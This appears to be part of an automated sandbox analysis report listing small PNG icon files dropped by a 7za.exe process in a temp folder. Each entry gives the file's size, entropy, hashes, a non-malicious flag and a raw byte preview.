      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):285
      Entropy (8bit):6.717054113376103
      Encrypted:false
      SSDEEP:
      MD5:B538AB6FBB9625BC354A4D8727E83B52
      SHA1:B12F9642FCFEC541BA23B6280EDB008A9F1C7E5C
      SHA-256:77C5A6B67BA998A303E926D0E587D6A2C032BF4EACB711C5747EC4E5F66CCDD8
      SHA-512:090DB4D6A9AF7042C939D299B11D99CBB3009BE136538B13F4DDF051D069D87A067AB912DDE01A7D892B603A98174E4139352FA5D2EE4187E95F0675EDD09B96
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`.v@u.A.....0......@.<.N .p ....-aBS.s.|R,A2....pY....H...p.H..c..&.H...$.....\..:..D./ ..../.o .p......+.c8Q..(.%S..&2...|.DF$.....&..4... .pb..G2I...P..,.p.....b8.K@............sV0.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):224
      Entropy (8bit):6.381403163997639
      Encrypted:false
      SSDEEP:
      MD5:EAAFF477B765C1856F172749AB1D20C6
      SHA1:10D0E3FD2EF975836CDD24CC774A2C178600D7B5
      SHA-256:88A9723EB3FDDC3F31D8002FFFCE1C57E441278315CF6077FF3B5B09B81FB596
      SHA-512:013E45D4DD5CD4094FF70B85D7133E5CBA134FA978DA900E74FB20333CDEAB168E76BDFC72694B28329A01EE7FAEC542C65AB8247AD4D96D52F68375871B24DC
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`.T`.M.@l.G....Y..Y3.*..........A6..I.B ..... i...Y..c.a.L.#T.E.....V.p..K3V....K3z..........f.B|r.a....(..)..S-).<..0.P._.r.&.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):224
      Entropy (8bit):6.380842016591064
      Encrypted:false
      SSDEEP:
      MD5:268D08EB82BC8BEF082117CF207515D8
      SHA1:EDC0170317757BB0EB1149B9271ABDF6FBC157D4
      SHA-256:F2E2B3D3CD6E2A37F052079CA0FDA806930B416EEA591B78130A8917B6321E2A
      SHA-512:95ED9C722C803B2D16D0DEA8ACB52BA47C5771D08C840EDC82005252B69F51886937ABE7ECEDE55A5E453F97EE130FE4EC18B9606D156E43F9DC5EB46EB46CAA
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............,.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`.T@u..~ 6.#o.R.,...H...~l.@.... ...f!...b.tC.4.@.,..1.....*."v;...V.p..K3V....K3z..........f.B|r.a....(..)..S-)....`.).X.B..:....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):339
      Entropy (8bit):7.075235979248525
      Encrypted:false
      SSDEEP:
      MD5:B1BB6AB22109132EC1329452891E78A5
      SHA1:E686D4A70BFF439350A01261F9BD5715B915E996
      SHA-256:3DC3957D0937C0EB1F9CA8FA240C924ECFB7EA5AD3A88F24BAA92F3952924989
      SHA-512:572B64C47D46DC284D81040F670AE1411C0904713F660C9F594007EEEC500BC2B0B7EF5BCC38A46E44767E993BC84AABB20C65E8BA6A008E4C47B728FEB98C33
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.....0.D.*............xG*`...@.^,..t.Y......,.....c........%^....iwq'..F.*(.XTC..!..h.A...o..7..9......y..~K.@.Jp.......\.Z2&.c.......Y.GCG$r. ..[.t..D.... ..g..10k..k.....A.&Y.dZ...05..?..+.@...)..g....#;.A.sh./A......fs/S/`.2.../....Wl.........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):335
      Entropy (8bit):7.043631018247249
      Encrypted:false
      SSDEEP:
      MD5:34720D041B03C8E0D6156FAD6E31764E
      SHA1:BAEB8629113BB9390D1633C5C7C60FB45DDBC9A6
      SHA-256:6BDE202A3A54204537701B7BD7E9714E9AC4E5825348817C00EB91C7B961F0E1
      SHA-512:80A7BE2EDA53854495E2F269F6C38447783D1CE61BEAE10C7DE14677670B122C1EB80E728D36DF68B15AA8335A4CC82E1EE3CF0865738B497C144CB6307FB73A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.....0....t.F..`..../f..2.a..@Fp.n.w.j*.....}WZ^#.......P.H.P[U.-...0..A)..rJ[...|...=.....'K$'.%PG..b..&.r..<..<)..\.Z2&.S...PMI.l..@G$J.#..[.u..J....A&.g.....#.&4H.`.7..${..H....&...Rue.... ..v.l..Y....a......XyPm..29....u~.0.h7n1.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 12, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):183
      Entropy (8bit):6.085971185144179
      Encrypted:false
      SSDEEP:
      MD5:F911B1490A3531762368E7455D601A2A
      SHA1:AFB99BFED99A078737D8DEF32304833EE4156250
      SHA-256:8703BD9324DE6F1E7DCAA0A14836E1E3E1379BE6923ADA7AF141D0771620DD3B
      SHA-512:E3CE6A4EA55FB17EF2EACCDF775D76600D0CE6874E5E92CBBDCEA8E4537B4AB0AEFC6AC25ECBEAE670DFE2822EABE13B07C857780324E55718136EA74BCDE9F7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............k.=.....tEXtSoftware.Adobe ImageReadyq.e<...YIDATx.b`.%......+P..<...b.r5...i~..6 U..61.5.#G..Bj.......!.LP..P....x...@9.. >.0h.@....8..j.y;....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 12, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):201
      Entropy (8bit):6.278741533893115
      Encrypted:false
      SSDEEP:
      MD5:BDFFD5409B6CB700193CAD9B60E6E167
      SHA1:1B0E4D7CD9EB7D22430ED034D9A8F26D1A0A6746
      SHA-256:A6ECF8BAB85C5030E4622A4EBBABFFEF5B992EFDE0A2988431E9A018D522FC42
      SHA-512:B89312ED2AA5D8936E15A3C14AEF3DF916351DC23801936447968D8500A8A879AF32E08EFB971BC29E48DDF490E4986779E504E81A379EEB221A7D333F1EA7AE
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............k.=.....tEXtSoftware.Adobe ImageReadyq.e<...kIDATx.b`.%...?/.KQ.y....b5\..qi.R3....3..322.BW.D@3H#H.X..K.}..tlbDk&F.8....9=.....)X ~....(cd...........U'..........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 12, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):178
      Entropy (8bit):6.0500815177997165
      Encrypted:false
      SSDEEP:
      MD5:B56BAB74A3DD8A7223E2DDAB0AB19E9C
      SHA1:8C89DFBBB1446DD08893A5563BC8706704321C41
      SHA-256:091EB3FF2DBB604CF64F7DD1C7547633842279F63B17F61F6A0D9AF8D3100351
      SHA-512:B593C758D337FC393DA476A46CAC8E069060CA1D7703A5D8E07364DC1FA2C9D47B375B7752FDF804490FD055BDAC1290B4AEEAA7C036F6CEC883F90F8726F1F4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............k.=.....tEXtSoftware.Adobe ImageReadyq.e<...TIDATx.b`........=....V...C.+........@5.GR..K....D+ .........5.0.4.X.!]3.!.4M......r.c..X....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 12, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):202
      Entropy (8bit):6.3370247343752135
      Encrypted:false
      SSDEEP:
      MD5:0C5243C0F5BF39629183A66BE80ADC8F
      SHA1:967653844E17369F2C3ACD0FA99A0EC53F51B5BF
      SHA-256:792A6D3C060999FAD7238E98706A3DFB3FFAFCF796027DB556E4657B6FA74272
      SHA-512:19F149DB90CBBB5861D2E473085DDF20F869134F87B64FCFCF975267D7F02E86FA273107CBD950553B5E7598C1DFBB8C6B2780A7FDA5A7964EC5511BCD964009
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............k.=.....tEXtSoftware.Adobe ImageReadyq.e<...lIDATx.b`.......@....P...3....<@...3.....R....L]..gp....|.....BB.......3.?Gb.322..k..C.pi&&.........i"..0..*..-.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):139
      Entropy (8bit):5.57153011442093
      Encrypted:false
      SSDEEP:
      MD5:B8B9FF1E1F68E98B0A2961A13DD62A80
      SHA1:465536A6534676F1490A3228D7A8195132050014
      SHA-256:C9A53591D3612D2F2AB6A84681D9BC52C3B834736A37E51640899E6147378354
      SHA-512:09EB4BD15738E4C52B366AC5D6981DC620783BFE390F741566E5FB8B4F87F3D12F90147039DD521F7BEF4982A453FE75E9C09B30A63D567914D2A6033D7EAAB8
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...-IDATx.b`.h..c.9...Dzz..2..<....5`..a.............Z.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):139
      Entropy (8bit):5.618222380576851
      Encrypted:false
      SSDEEP:
      MD5:588AA0E77DEEF662382706C8812DEB5E
      SHA1:33B20BB438B14BD66896F02D2B3832807814A39F
      SHA-256:870A8281EBA77B8BB99ADB03093CDA53C41FE3BD49DFBF7E2CD49F0F30D036E2
      SHA-512:7AD284738C8D35C999B5498EF0915B92ED4C332C6D001C3C6123E0B4FDC5A802671455AD17DB53E8E439C02CD665E8A24F652AE2D55F0DF46B8CEF8B4936B828
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...-IDATx.b`.h..c.N98.Y.v.}:2..<....5`..a........C...+.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):250
      Entropy (8bit):6.388762089557065
      Encrypted:false
      SSDEEP:
      MD5:1E65CEC8295EAA46274D16FDBED7560B
      SHA1:F63A90FCDF248A515EC111AAD380E9CE0D9549A6
      SHA-256:86428A97585AA83BE1CC4A041E3B9E4A75A010270FADBD947037B4FEF657D064
      SHA-512:B3BFD4DFB3572104458C47892D31BFFA3B3B0E274A4BC5EBE4592DB8C36AF5BE422642417DEEFD9D6B5DC340EA454F1F75E81856D97040250CC9265D46C1E441
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`...`.....\.LD.Q...@K..X....@...|.@+.@...@K@X..........R.HD$.'........_.......7..../`.....I..D.X......O....@]...A..j..Zd..@.H.........F..Q.......(1.F.#.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):250
      Entropy (8bit):6.522184759768291
      Encrypted:false
      SSDEEP:
      MD5:1ED445D0828C5A02A24143572C696121
      SHA1:EE5B4A2B59E3E132502D2F55BA17B2F47D47F65C
      SHA-256:B3E83E079F22C39A7E70F810783729F5CC6F881B088DD220DED6FC8F4C5B7165
      SHA-512:228DC3B478361A8CB7C7FDBD24C21CF60D463B64F7A86CB8DFA13758318AA66904A5EAD9AA70C0EFC1DEDE9A8A90AC9389533AF89BA14D767FFC44494518E503
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`...@u..6 V#W?..j....hI..s....p..V.%.....@>..Z......@...Z.L+.`....(~dia...A}.K+....*........Lm.......{i.[@..h.[j..7hp\.E....U@.Q;..B...h.?.......p..:{.s.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):457
      Entropy (8bit):7.332514490697438
      Encrypted:false
      SSDEEP:
      MD5:33F922938B98385D9EC48FF8C1A07817
      SHA1:CA795B7EB409712395464EFC97FF0484819CD566
      SHA-256:DFDC18E0BB2D3EC42F4D574505F3C15616892ACBEB27899448976CB8CB088C52
      SHA-512:75FAC251659C63293B14C1FDFEFCCC9BAEC40451CD732013DBAE852D21BDFFB469537F2A4E0CAD27C1D646D571DDAB7049F32C6143925780021752542DF3AE3A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...kIDATx..U.m.0..O......&.N...g.A...O.h&(..6HF`.6h..w...b"hO....=.=...V.p.CY.?..0Z.cQ...p.0}......h.D9.v.Q@9./. ......c\@.M.....".H...'F._o.."....j.&.;0...*b...<..W.t..U.D.....a.....M4.^4.f.#...c.Z......5...^.m..S.D....g.i..h.Ra.E......(....jL....l..Lc..I.gmy..+7...w.j.L...p[.......{.rUK.:<.....tjAHv.iiT..i<.C.*..z....Tr...~.Uo.=.4.2C..nI.q.......e......k.P^....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):456
      Entropy (8bit):7.381756000934397
      Encrypted:false
      SSDEEP:
      MD5:9303BE4D3402AB54A7A73B967362A1CC
      SHA1:783335A291A5F650C75E36D6BC6F6473093D25F1
      SHA-256:BD6738E089D033167216E1DAED3E34D10E5AAFEA9C46ACF16D14616C7C78C3F1
      SHA-512:DCB7D1D89CA643CF15A26016274BFAD35B1F4D0359024256EFC197C67B5F5BDC7510BE180F2EC0F15AA663ABC458440FA97A0B83BA63FF0F29592365ED1C07D6
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...jIDATx..U.m.0..O.......&.N.2A.A....h&.3.......l..{.C....,#.....A...s.....g.Qc..8.>$.c.......6GT`o._0......D.q`.........q..T..).a.....>...l.`*.j...#...$.-..#n|.L..\.I..jx......9..D..E.`&:..\=........].....o.jL!.Q....5.A..5K.Y......E..|..f.1.*V....r.).'Q...)....c.\W..N.t....jP.T..O...P....3.....A...d.J.....8..m...<......aOV.!...h..=r.%..,M...:./..`..h.k.......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):461
      Entropy (8bit):7.365349368293504
      Encrypted:false
      SSDEEP:
      MD5:10EE1CFA21E4D7DC55B778716DE28442
      SHA1:269929EB5A20D11DD334F7B3EA203E94EA8E425E
      SHA-256:62FE65DD6379D829020DA7B7C3F4376406E4D775E520569058F9F5E04A931C7E
      SHA-512:DE7A93210F7531817BD787D8E1A98A795E3EE21CA61AF04A68E7DD05B3AFE133F0468B75A1535AE53419C2CABF8414AEB21E34FC3E2C12BCA0180D8BF3B82F4D
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...oIDATx..U.m.@.......?..P.....%.....R....W.. ..C.t..I...... Y.t.........-...........8|....p,0...p.{..Y..{.w.(...G...QX.1.@.....>.".H...+F._..)."....b.&..3....b]..<..'.t..Y.D.....d.....M4.N4.f.#...c.Z....._4.....m..S.D....'.i..h.Ra.E.....(.N..jL....l..Lc..Q.gm...+7....w.j.....p[.*.....{.rUK*:......4jAH..i.T..h<a.C.*.....Tr.....Uo.=...2C..nH.p.....\..e......k........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):888
      Entropy (8bit):7.670506521373948
      Encrypted:false
      SSDEEP:
      MD5:E9C35A488B41FFA9645C0592B13C8C15
      SHA1:F54AEFB44FE34CCEAE28A808C270FE8F670B922F
      SHA-256:025E7E8699FD9C246452C6634D4935149BAA6A6ACADB91B0F9ADF52D11A094F9
      SHA-512:33AB1CACE6FF121A34D262855219CFAF22C4E3B94EEACABFD3EE290784C261885A270AEC9354D639CCD9BBCBA3EEB658554AE440373C43CC8CC35313F7867485
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.._..@...K}5.@8......l..p.....`...'.^.1...O....g........dM....!C...Lw..n..._o/...yH..!=......CzH..!=..m/...0..z...KK:.....c......4.A.TG.L.2....I,2....v..\......;.M.Vb....:f.Rl...1...0.....S.....G.....yU.....S...J.U.6*.|7..^..HL.....fEW...^W._.`r...G...N....k....]M...D.?........s..~3S.**.../y.;}G.CRJ..u.....Lh.....N.=.q.j....n..k,..=...........7...7..`.j...|L..?.Bz....~..U(...g...@.7#.:U..j.='0o./jS..D...+.JPe....&.>.e]Yw.K....Tm1+j.ta^.. ....y4..~...c.......}....L...7.,....H.U3.).;s,i.V+7oZ..B.'S.8.]....S9....2.L.}...M..2-...?....\.|S.....n.,....g.......9e.Y...S.....=..V.Z+.^Y.zd{g~70...g<YE..3;.....r.3Cj.s.O...."y.8.....j.).5...M.8.4;..PE..Q.22.#.9.....m(......+.Pf.W..'...;....U1.....#...dW.,V=n.|Q.........pzH.......W.CzH..!=......C^J.-....d........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 55, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):812
      Entropy (8bit):7.6537005596626075
      Encrypted:false
      SSDEEP:
      MD5:DAFA53EED9D398A47CB8220320DEF70D
      SHA1:34FE68DDB96EE1982C96BA8D2BD58891E772B758
      SHA-256:CF4496BCBACF5F7A69CA250A0860E0D0226039042CE91001772D0F1F349C6996
      SHA-512:C69E197E83E1652414AD276D5C2D5FE740ABF075C7AC758A6AFF1BD93796D866A80396097777225101CFE959316706AC8F0A6F251D58A327897C3B92F57C65E4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...7.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx...Q.0..c.8......p.p!T@R......T..`.p.. ..S.>.!.2.`G.X.eb.V3;b...V...l6k......M .R .R .R .R .R k.}&.A`..3xjR.%9"i...sB........Hi...y.....Iz.'.2%i.4.o#.[.Mk.I.7..Pj..d.Xu......@oj...`.......1.....1I.[....p..NW.I:.....q..Y.w..E..S.P5...{....ZH.w*.`.pZy..@U..........r4..{..g..j ....\.....4A,m....I^...3O.M3^F...E.^.A.x..g...U.B.~.....;..c...Vp..h.+..}..g.>I.@b...1.s..O.....{.@.9...Dz,..N.JH..Yc".....@~..M(.xR.lL=i5#x.........3-.R..#.<.....!9.k...[+....e....$SH..l..w.tH8..H.-!.t2:..[bd[..G'U....t"d>.%......p.Q....Z.W.g..>]..E.XJ...K..-..98..L.{C*+.....r...cV.|......?.p.AQ...3J]..^.k..Uk@....(..[O.*..d.Py.dQ.@...Eu.T/|.E....."...dI.%..yq.V....~4_.u2...c.+...)M.u'..)..)..)...'.....QL...g....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):489
      Entropy (8bit):7.337423860715265
      Encrypted:false
      SSDEEP:
      MD5:1248EB19408BD68086806A307B9723CC
      SHA1:58AA56261D681A7A4BB56F8386E3D943096CE550
      SHA-256:5FD7277DEF0E25B5E3F436940B3C9297DE93811B8EFA9D8B39077C88EE5D4164
      SHA-512:5C2D3C5B1143B4C32895019872A19E53F7B36114EBA873B56CD996ABFE5A61C8471B44130A5656D8BACB9AA5C7C75F26411E05602F2BDDB616298D76091BFF24
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...M.@...(p&...$.r!T@.......*p: \...`:0.p.`.H.4.bb..6..i..xv......<......$$!.IHB....$$!.IHB...978....'{\.>...|W..U.U...!O.^f.<UpM....`..)@.>CJd..ktt....A..S..)...[.}..5k.gu.:l+...U..7s.i...b.u..d..... ...DjU.l....iI.s..L./d.AHMj.q.....m......W.R...hp.C.Y..P!.....Q...... #.). .MW{Dt!BF.t.l$%.c-...7..I.`....O.fN..O>..z...=X..^..}...!.......n........\Ig.?......$$!.IHB....$$!.YG..........{*....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):592
      Entropy (8bit):7.4773599576262155
      Encrypted:false
      SSDEEP:
      MD5:9D3950A73A0D91DD851BAB6E219BF8DC
      SHA1:D79B778B44E8EDA00C8F8227F81336B46B49A7FE
      SHA-256:D1FB5CA3736FF9BBE42467F52C3F4C5E00A060745554AD3A33722BFA331F2D73
      SHA-512:00024C62FE1AEB8D6DAB18208A443423FDCBB7B3A290C4B337753FE9AC25FADE14250E1EFA16E531E9E25A0BD94C3184ADBB44A8A6110D8BD49E64D1CC3DC018
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...q.@...y..J...5/.I......... >..v@....y {.ef.,........xw......F.........$ ..H@.....$ ...nm..D.......+...B..;|.Q.m.......H>.[....<..;...{.4M.....%..Xwc>..........1.JB.\o.......4.9.H1....8...')jC....9*v/.}..S.J.%^H...SH..OE`Y.iM..D..S^.. ?...|....."e..i$IJi."...d..h\.L...|.....,.9..YVA.R.{Er#!.K-e.2.S.n.ij..Q.9...u.......u_i.R....\.uV....J.1m..k..|......T-..)..F.3.......[z..m...T..;.UN.......*.@.:..G..r3?r..R.... ...........Xw.l......#....$ ..H@.....d..#...q...7......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):591
      Entropy (8bit):7.4320084112466525
      Encrypted:false
      SSDEEP:
      MD5:BB3E7399E858C2C387962BCD413B7B94
      SHA1:BA2190182664DA6311E6A839D2825C76B054384C
      SHA-256:1ABA713E3AF055903523F2C8AC3C1CFCD456D165F36062908C8CD90E160D2993
      SHA-512:9DB61CD0CC98CCDFE9A924374EC7B958A09A83CB4A07473C0C1F90076FBE385F65C0C50AA7F536DAC00FDA94F01D5143A1ADBFF57393743EDC3CF95F9111BEC6
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..ON.@..[S]s.....e.+<.x....^......J...PO`.....k21.6a...%..........t:9]....&..)..)..)..)..).....%WOo;.>......j.=M....A..N.,c.......d..tu..O.F..F.}=...@....Y.3.k...#.\....Y..M..t5Oj..^...@.d....F...r%@>.....(....um.9.Q.&2..l.+K4%.U...\q..x.......c...($.q...Xy...D.;"%..".....mK..MB6.'7....R...dF.>3.G.f.4..T9...B..\xpn......0..n#A...z.Q.e:4U.\...4.1.Ow!uw."..!.5....2S.2...%..A..`...U.+UQc....=.....x..1....:.[...7..<WT7.8...V@*u.B9{.}Q.k<d.S.@..@..@..@..@.b?......QH......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):605
      Entropy (8bit):7.422328000779915
      Encrypted:false
      SSDEEP:
      MD5:B6FA642E910A0E410274850DB439E190
      SHA1:90028AED6E1B94D982A41A412883F5231951F241
      SHA-256:855FD9809D99A24B6327DD9F7C0D8309C2413C6A28D9EB22F23499A71315B35B
      SHA-512:529DAB97DAB8D2E4B9A4AF3A18FB55CD7DCF60684D09CFB3B56D456BD16F4B02E2663D12040B165F52C2BB626E0B1E6C3640099E14168AC5CB9E6D980EFFB634
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...Q.@...>.......Q..........;.../.z..;..x.....f.&s!.\......q....nc..n;..'.. .)..)..)..)..).m....AP:.l...@z..j.../.....u....V.$..f..A..K........!...a./....F...Z.w...7#.?..[H.>....O06....G.j....O....aW.Ka>0m.w9i(<C2>...).}..5.G..+kV\t.....,......R"].Q....#.a*>q.F.$\m...4..=....V{...*_x..;*Or5M.b0.]...I.9)]..../.M._..O.,\..>..jj.0..<.}..|.q.....uv{G.d...=.W9....)J.......|6.G.)....9.%.....y..."#...g...........p0...a.6.>x..2@.E|'..8...6.....z~#..N..p.8j.TeO..A.A..>.)..)..)..)..)..)...W...5....31....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 54, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):542
      Entropy (8bit):7.352351487070236
      Encrypted:false
      SSDEEP:
      MD5:01A02AC5E5612F49C6EBA4A7481C2DB4
      SHA1:4B951087EC63BBFE3E4A1ADB656C80CBBE8CB9CA
      SHA-256:F268BB5621E20F268D7D82EED2123F0A49E34724CB82A61767BC533B11DB92EC
      SHA-512:E2C7BFE7BBADF3AF27242B9F3EC7ADABA0E0B0A775E08FA29222F24F12069B5809A3F7C55EED9B71987A67D97CFE811E6E4E09D6DEFEB51495D5ABC446840F9A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...6.....}N1P....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..AR.@.E...#.....K. 'PO......... a.K..x.n`.."...J...43..U]..0oz...!..:.=.....................P..|9...8}........B._.y..X8.a...p1...3.>,$~8a......D^.j.mU....i#A......vpRx...,....x@..._6>F.!.....1'.Z.nu].$.O..e.}rG...m............:R.|.A....#.;...@..$.x..k!.1.....!<&..{...0...j..............%3`.>7.f n.Kk-...pq..nj...X.6..'.!.^ '..g.....t.qm...;Wu.3...M3`.o%h...P.h...M......<.....|^_f`.j.1.q...I.Hp..3..%..;.TH.TH.TH..?.....(.p.`.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):617
      Entropy (8bit):7.490262565158217
      Encrypted:false
      SSDEEP:
      MD5:E5BED659BEF710BAB67DD874A603AE25
      SHA1:96FDBD32C231A40344BCE2813C131FEF97894810
      SHA-256:A602B18C7A2E73E3F1E8A5592AC30883E64CDE963C7256319DDEB24AB128B95F
      SHA-512:94F7D8AC3337699DFF238CCB49D691F6D875A8008A97693E6F9782E6108F9C12971CD7C15C5823764FCD4522613459DA9B06809DE0BFA5905C9C5D3DE0D5302E
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...9...8.....GDP ....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...Q.P...G=....*0.."....6.6 P.P..Gc...(!^...:...........L.!.|.ow..j.......`.)..)..)..)..).........k........6.T;.....k|.l...c._v.....^F...Z.....S.!Y9..(7............w...{..E.C.2$...fg.\....K..w..+I!:......nhz8..v.=%$.<....5b.QT}.#K.l.+m..l..I...K.......3.Qy..:nb'.Z....iQ.JEb*..V..m..@9L..}R2.....4..+i3'e...B.\......&.....%.U........@t>..S[J...U.W.2JF<.F.r2.G....SZCwJ..~..x.\....]...,.5.G.4.?.3..M..y..p|.S.:k..Pb.s<*.......:.@i..)I...R........_E3`.....]..........w...d.L...H..H..H..H..H........K..4...^....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 57 x 56, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):445
      Entropy (8bit):7.238707460031458
      Encrypted:false
      SSDEEP:
      MD5:6907CD701706FAC815473FFFC96B934E
      SHA1:6E22EC8A722C37209F72959D23A0F25628CEC0B5
      SHA-256:D9E8FAB5F0B6AA7823B5FE0B4DDBF53633C64CF34DBF5246461AF565CA5A8CE1
      SHA-512:2999DA14438E7176EAD7CD05153571B5A922912F628CC1D5FB1F7AC714762D7ADE2DA0ADB62813651757B8BE13CB49F7737EBA9BE7060E8EA2CF85E2CD19E88D
      Malicious:false
      Reputation:low
